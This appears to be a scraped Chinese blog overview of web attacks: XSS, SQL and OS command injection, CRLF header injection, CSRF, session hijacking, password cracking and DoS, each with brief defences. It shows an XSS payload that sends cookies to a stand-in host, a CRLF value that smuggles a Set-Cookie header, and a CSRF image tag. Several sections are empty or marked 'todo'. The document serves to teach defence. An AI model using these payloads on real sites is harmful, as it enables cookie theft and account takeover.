web安全
對web的攻擊可分爲兩大類:javascript
- 主動攻擊
該類攻擊是攻擊者直接對web服務器上的資源進行攻擊,最具表明性的是SQL注入攻擊和OS攻擊及DDOS攻擊。 - 被動攻擊
攻擊者不直接對服務器發起攻擊,事先設置好雷區,等待雷區被觸發,具備表明性的有跨站腳本攻擊和跨站點請求僞造。
因輸出值轉義不徹底引發的安全漏洞
xss 跨站腳本攻擊
攻
Cross SiteScript,跨站腳本攻擊,又稱css攻擊。 css
其核心思路就是將惡意html代碼注入到目標網站中(如<script type="text/javascript">alert('boom!')</script>),因此常常發生在動態生成html的場景下。 html
攻擊成功後能夠作的事情有不少,好比將cookie發送出去,URL跳轉等。java
只要有用戶輸入的地方,數據存儲時沒有對其進行處理,用到改數據的頁面都有可能受到XSS攻擊(對於script的攻擊方式,數據以直接拍到頁面的方式纔會使攻擊生效,ajax請求到數據再經過mvvm框架渲染的方式是不會觸發腳本的執行的。但,XSS攻擊不只僅侷限於script)web
XSS的危害
- 利用虛假表單騙取用戶我的信息
- 竊取用戶cookie
拿微博舉例,若是某人發了一段包含<script>window.open(「www.aa.com?param=」+document.cookie)</script>的微博,且XSS攻擊成功,那麼看到該微博的人都會受到攻擊,其cookie被髮送至www.aa.comajax
防
- 對用戶輸入的<>""''/&等字符進行轉碼
- 對關鍵cookie進行http-only設置,這樣js就失去了訪問cookie的能力
SQL注入攻擊
攻
在web應用對數據庫的查詢,添加,刪除等操做環節,請求參數參與SQL語句生成,對於調用SQL語句的拼接環節存在疏忽,產生SQL注入攻擊。shell
危害
- 非法查看無權限數據
- 刪除數據
舉例:todo數據庫
防
todoapi
OS命令注入攻擊
攻
web應用能夠經過shell調用系統命令,所以若是在調用時存在疏忽,就有可能執行了不被指望的OS命令。安全
危害
防
http首部注入攻擊
%0D%0A表明HTTP報文中的換行符。好比在響應頭中的Location:www.a.com/aa?id=999添加爲Location:www.a.com/aa?id=999%0D%0ASet-Cookie: xxxx,那麼就會多出一個set-cookie響應頭。此外,連續出現兩次%0D%0標誌着http頭部與主體的分離,一樣能夠利用這個來修改響應主體。
攻
指的是攻擊者經過在響應頭部字段中插入換行,添加任意響應首部的一種攻擊
危害
- 設置任意cookie(利用Set-Cookie頭)
- 重定向至任意url(location頭)(若是status爲200可是有location會怎麼樣)
防
話管理疏忽引發的安全漏洞
會話劫持
攻
經過手段拿到用戶的會話id並以此id假裝爲用戶de攻擊。
危害
防
跨站點請求僞造CSRF(cross-site request Forgery)
攻
指攻擊者經過事先設定好的陷阱,在用戶不知道的狀況下發起對某些站點的請求,從而達到修改用戶在目標網站裏的數據的攻擊。
如在a.com裏有個<img src="b.com/account/delete" />的標籤,此時用戶訪問a站點時就向b發起了delete請求,假設該接口就是b站點的刪除賬號api,且b用戶偏偏剛訪問了b站點不久,還存有未過時的cookie,那就慘了。
危害
- 修改用戶在目標站點的數據。
防
- cookie的有效期儘可能縮短
- 服務器判斷referer
其餘安全漏洞
密碼破解
攻
- 字典攻擊
事先收集好一組候選密碼一一嘗試
- 窮舉攻擊
如銀行密碼是四位數字,則窮舉便可。
危害
防
DoS(Denial of Service)攻擊
連接描述
一種讓運行中的服務器呈中止中的攻擊
分佈式的多臺計算機發起的dos攻擊稱爲ddos(distributed Denial of Service)攻擊
攻
在第三次握手環節耍流氓不響應服務器,形成tcp半鏈接狀態。不停地發送syn握手,就會形成服務器資源大大消耗。
或者tcp全鏈接,可是每一個鏈接都不釋放,最終達到服務器上限,癱瘓
1.製造大流量無用數據,形成通往被攻擊主機的網絡擁塞,使被攻擊主機沒法正常和外界通訊。
2.利用被攻擊主機提供服務或傳輸協議上處理重複鏈接的缺陷,反覆高頻的發出攻擊性的重複服務請求,使被攻擊主機沒法及時處理其它正常的請求。
3.利用被攻擊主機所提供服務程序或傳輸協議的自己實現缺陷,反覆發送畸形的攻擊數據引起系統錯誤的分配大量系統資源,使主機處於掛起狀態甚至死機。
危害
直接使服務器掛掉,影響了公司服務正常運轉
防
- 提升服務器帶寬,性能等
- 硬件防火牆專門過濾惡意來源的請求
- ng設置黑名單
location / {
deny 1.2.3.4;
}
- 上cdn
- 1. 【web安全】淺談web安全之XSS
- 2. Web 安全
- 3. web安全
- 4. Web安全-SSRF
- 5. WEB安全
- 6. web 安全:
- 7. Web安全
- 8. Apache Web安全
- 9. web安全色
- 10. web安全類
- 更多相關文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • C# 不安全代碼 - C#教程
- • Composer 安裝與使用
- • Tomcat學習筆記(史上最全tomcat學習筆記)
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 【web安全】淺談web安全之XSS
- 2. Web 安全
- 3. web安全
- 4. Web安全-SSRF
- 5. WEB安全
- 6. web 安全:
- 7. Web安全
- 8. Apache Web安全
- 9. web安全色
- 10. web安全類